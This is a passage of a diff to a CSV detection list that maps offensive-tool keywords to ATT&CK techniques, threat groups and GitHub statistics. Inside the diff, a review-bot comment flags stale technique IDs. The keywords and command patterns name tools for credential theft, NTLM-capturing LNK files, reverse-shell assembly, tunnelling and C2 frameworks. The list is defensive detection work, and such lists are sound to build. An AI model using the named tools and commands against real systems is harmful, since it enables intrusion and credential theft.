Spoofing","https://github.com/SpiderLabs/Responder","1","1","N/A","N/A","10","4198","1633","2020-06-15T18:07:44Z","2012-10-24T14:35:12Z" -"*LLMNRSpoofer*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*LLMNR.py*","offensive_tool_keyword","responder","LLMNR. NBT-NS and MDNS poisoner","T1557.001 - T1171 - T1547.011","TA0011 - TA0005 - TA0003","N/A","N/A","Sniffing & Spoofing","https://github.com/SpiderLabs/Responder","1","1","N/A","N/A","10","4199","1633","2020-06-15T18:07:44Z","2012-10-24T14:35:12Z" +"*LLMNRSpoofer*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*llsrpc_##*","offensive_tool_keyword","cobaltstrike","A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - 
T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/bluscreenofjeff/Malleable-C2-Randomizer","1","1","N/A","10","10","421","96","2022-09-09T15:50:16Z","2017-05-31T15:44:43Z" "*lmhash*aad3b435b51404eeaad3b435b51404ee*","offensive_tool_keyword","pywhisker","Python version of the C# tool for Shadow Credentials attacks","T1552.001 - T1136 - T1098","TA0003 - TA0004 - TA0005","N/A","N/A","Credential Access","https://github.com/ShutdownRepo/pywhisker","1","0","N/A","10","5","418","49","2023-10-03T14:10:17Z","2021-07-21T19:20:00Z" "*lnk-generate.py --host * --type ntlm --output *.lnk*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" 
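Review bot: The re-added `*LLMNR.py*` row keeps `T1171` in its technique list, an ID ATT&CK retired when sub-techniques were introduced; the same behaviour is already covered by `T1557.001`, the first entry in that field. `T1547.011` also looks out of place for an LLMNR/NBT-NS poisoner (as far as I recall it was the Plist Modification sub-technique) and should be confirmed against the current matrix. Stale IDs cause coverage mapping built from this file to miss or mislabel the rule, so I would reduce the field to `T1557.001` unless there is a source for the others. The bare-filename pattern also appears to have both detection flags set to `1`, so a note in the row's comment field about false positives on unrelated files with that name would help triage.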
@@ -13181,34 +13338,34 @@ "*Load-BeaconParameters*","offensive_tool_keyword","cobaltstrike","Load any Beacon Object File using Powershell!","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/airbus-cert/Invoke-Bof","1","1","N/A","10","10","232","32","2021-12-09T15:10:41Z","2021-12-09T15:09:22Z" "*Load-Bof(*","offensive_tool_keyword","cobaltstrike","Load any Beacon Object File using Powershell!","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - 
T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/airbus-cert/Invoke-Bof","1","0","N/A","10","10","232","32","2021-12-09T15:10:41Z","2021-12-09T15:09:22Z" "*loaddll64.exe*","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003","N/A","N/A","C2","https://bruteratel.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" -"*loader/inject.c*","offensive_tool_keyword","donut","Donut is a position-independent code that enables in-memory execution of VBScript. JScript. EXE. DLL files and dotNET assemblies. A module created by Donut can either be staged from a HTTP server or embedded directly in the loader itself","T1055 - T1027 - T1202","TA0002 - TA0003 ","N/A","Indrik Spider","Exploitation tools","https://github.com/TheWover/donut","1","1","N/A","N/A","10","2877","557","2023-04-26T21:11:01Z","2019-03-27T23:24:44Z" -"*loader/inject_local.c*","offensive_tool_keyword","donut","Donut is a position-independent code that enables in-memory execution of VBScript. JScript. EXE. DLL files and dotNET assemblies. 
A module created by Donut can either be staged from a HTTP server or embedded directly in the loader itself","T1055 - T1027 - T1202","TA0002 - TA0003 ","N/A","Indrik Spider","Exploitation tools","https://github.com/TheWover/donut","1","1","N/A","N/A","10","2877","557","2023-04-26T21:11:01Z","2019-03-27T23:24:44Z" +"*loader/inject.c*","offensive_tool_keyword","donut","Donut is a position-independent code that enables in-memory execution of VBScript. JScript. EXE. DLL files and dotNET assemblies. A module created by Donut can either be staged from a HTTP server or embedded directly in the loader itself","T1055 - T1027 - T1202","TA0002 - TA0003 ","N/A","Indrik Spider","Exploitation tools","https://github.com/TheWover/donut","1","1","N/A","N/A","10","2878","558","2023-04-26T21:11:01Z","2019-03-27T23:24:44Z" +"*loader/inject_local.c*","offensive_tool_keyword","donut","Donut is a position-independent code that enables in-memory execution of VBScript. JScript. EXE. DLL files and dotNET assemblies. 
A module created by Donut can either be staged from a HTTP server or embedded directly in the loader itself","T1055 - T1027 - T1202","TA0002 - TA0003 ","N/A","Indrik Spider","Exploitation tools","https://github.com/TheWover/donut","1","1","N/A","N/A","10","2878","558","2023-04-26T21:11:01Z","2019-03-27T23:24:44Z" "*loader/loader/loader.c*","offensive_tool_keyword","cobaltstrike","A protective and Low Level Shellcode Loader that defeats modern EDR systems.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/cribdragg3r/Alaris","1","1","N/A","10","10","846","136","2021-11-01T05:00:43Z","2020-02-22T15:42:37Z" -"*loader_exe_x64.*","offensive_tool_keyword","donut","Donut is a position-independent code that enables in-memory execution of VBScript. JScript. EXE. DLL files and dotNET assemblies. 
A module created by Donut can either be staged from a HTTP server or embedded directly in the loader itself","T1055 - T1027 - T1202","TA0002 - TA0003 ","N/A","Indrik Spider","Exploitation tools","https://github.com/TheWover/donut","1","1","N/A","N/A","10","2877","557","2023-04-26T21:11:01Z","2019-03-27T23:24:44Z" -"*loader_exe_x86.*","offensive_tool_keyword","donut","Donut is a position-independent code that enables in-memory execution of VBScript. JScript. EXE. DLL files and dotNET assemblies. A module created by Donut can either be staged from a HTTP server or embedded directly in the loader itself","T1055 - T1027 - T1202","TA0002 - TA0003 ","N/A","Indrik Spider","Exploitation tools","https://github.com/TheWover/donut","1","1","N/A","N/A","10","2877","557","2023-04-26T21:11:01Z","2019-03-27T23:24:44Z" -"*LoadEWSDLL*","offensive_tool_keyword","MailSniper","MailSniper is a penetration testing tool for searching through email in a Microsoft Exchange environment for specific terms (passwords. insider intel. network architecture information. etc.). It can be used as a non-administrative user to search their own email. or by an administrator to search the mailboxes of every user in a domain.","T1114 - T1134.002","TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/dafthack/MailSniper/blob/master/MailSniper.ps1","1","1","N/A","N/A","10","2625","554","2022-10-20T08:13:33Z","2016-09-08T00:36:51Z" -"*loadKirbiFile*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11786","3291","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" -"*loadliba_reverse_tcp.asm*","offensive_tool_keyword","the-backdoor-factory","Patch PE ELF Mach-O binaries with shellcode new version in development*","T1055.002 - T1055.004 - T1059.001","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/secretsquirrel/the-backdoor-factory","1","1","N/A","10","10","3185","809","2023-08-14T02:52:06Z","2013-05-30T01:04:24Z" -"*loadliba_shell.asm*","offensive_tool_keyword","the-backdoor-factory","Patch PE ELF Mach-O binaries with shellcode new version in development*","T1055.002 - T1055.004 - T1059.001","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/secretsquirrel/the-backdoor-factory","1","1","N/A","10","10","3185","809","2023-08-14T02:52:06Z","2013-05-30T01:04:24Z" -"*loadliba_single_shell_reverse_tcp.asm*","offensive_tool_keyword","the-backdoor-factory","Patch PE ELF Mach-O binaries with shellcode new version in development*","T1055.002 - T1055.004 - T1059.001","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/secretsquirrel/the-backdoor-factory","1","1","N/A","10","10","3185","809","2023-08-14T02:52:06Z","2013-05-30T01:04:24Z" -"*loadmodule *.ps1*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - 
T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1601","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" -"*loadmodume */modules/*.ps1**","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1601","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" -"*Local:Get-DelegateType*","offensive_tool_keyword","empire","empire script function. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1047","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"*Local:Get-PEArchitecture*","offensive_tool_keyword","empire","empire script function. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1047","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"*Local:Get-ProcAddress*","offensive_tool_keyword","empire","empire script function. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1047","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"*-local=0.0.0.0:4001*","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","9891","1162","2023-10-01T20:54:43Z","2015-02-25T11:42:50Z" -"*localexploit_demo_template.erb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. 
and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" +"*loader_exe_x64.*","offensive_tool_keyword","donut","Donut is a position-independent code that enables in-memory execution of VBScript. JScript. EXE. DLL files and dotNET assemblies. A module created by Donut can either be staged from a HTTP server or embedded directly in the loader itself","T1055 - T1027 - T1202","TA0002 - TA0003 ","N/A","Indrik Spider","Exploitation tools","https://github.com/TheWover/donut","1","1","N/A","N/A","10","2878","558","2023-04-26T21:11:01Z","2019-03-27T23:24:44Z" +"*loader_exe_x86.*","offensive_tool_keyword","donut","Donut is a position-independent code that enables in-memory execution of VBScript. JScript. EXE. DLL files and dotNET assemblies. A module created by Donut can either be staged from a HTTP server or embedded directly in the loader itself","T1055 - T1027 - T1202","TA0002 - TA0003 ","N/A","Indrik Spider","Exploitation tools","https://github.com/TheWover/donut","1","1","N/A","N/A","10","2878","558","2023-04-26T21:11:01Z","2019-03-27T23:24:44Z" +"*LoadEWSDLL*","offensive_tool_keyword","MailSniper","MailSniper is a penetration testing tool for searching through email in a Microsoft Exchange environment for specific terms (passwords. insider intel. network architecture information. etc.). It can be used as a non-administrative user to search their own email. 
or by an administrator to search the mailboxes of every user in a domain.","T1114 - T1134.002","TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/dafthack/MailSniper/blob/master/MailSniper.ps1","1","1","N/A","N/A","10","2626","554","2022-10-20T08:13:33Z","2016-09-08T00:36:51Z" +"*loadKirbiFile*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*loadliba_reverse_tcp.asm*","offensive_tool_keyword","the-backdoor-factory","Patch PE ELF Mach-O binaries with shellcode new version in development*","T1055.002 - T1055.004 - T1059.001","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/secretsquirrel/the-backdoor-factory","1","1","N/A","10","10","3186","809","2023-08-14T02:52:06Z","2013-05-30T01:04:24Z" +"*loadliba_shell.asm*","offensive_tool_keyword","the-backdoor-factory","Patch PE ELF Mach-O binaries with shellcode new version in development*","T1055.002 - T1055.004 - T1059.001","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/secretsquirrel/the-backdoor-factory","1","1","N/A","10","10","3186","809","2023-08-14T02:52:06Z","2013-05-30T01:04:24Z" +"*loadliba_single_shell_reverse_tcp.asm*","offensive_tool_keyword","the-backdoor-factory","Patch PE ELF Mach-O binaries with shellcode new version in development*","T1055.002 - T1055.004 - T1059.001","TA0002 - 
TA0005","N/A","N/A","Exploitation tools","https://github.com/secretsquirrel/the-backdoor-factory","1","1","N/A","10","10","3186","809","2023-08-14T02:52:06Z","2013-05-30T01:04:24Z" +"*loadmodule *.ps1*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*loadmodume */modules/*.ps1**","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*Local:Get-DelegateType*","offensive_tool_keyword","empire","empire script function. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
